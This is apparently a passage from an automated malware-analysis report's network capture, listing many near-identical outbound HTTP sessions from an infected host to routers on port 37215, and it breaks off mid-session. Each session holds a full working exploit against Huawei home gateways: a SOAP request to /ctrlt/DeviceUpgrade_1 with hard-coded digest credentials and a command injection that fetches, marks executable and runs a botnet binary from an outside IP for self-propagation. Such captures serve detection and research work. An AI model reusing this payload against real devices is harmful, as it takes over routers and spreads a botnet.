20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1705192.168.2.135501613.66.248.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535989046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1706192.168.2.1346616197.146.143.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535995960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1707192.168.2.1352660149.81.167.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536003113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1708192.168.2.1333980157.61.123.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536017895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1709192.168.2.133662441.240.233.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536022902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1710192.168.2.1357762129.30.165.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536204100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1711192.168.2.1338460197.61.184.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536204100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1712192.168.2.1335290188.189.60.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536207914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1713192.168.2.1352720157.228.25.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536210060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1714192.168.2.134799441.86.103.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536257982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1715192.168.2.1333440157.143.169.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536314011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
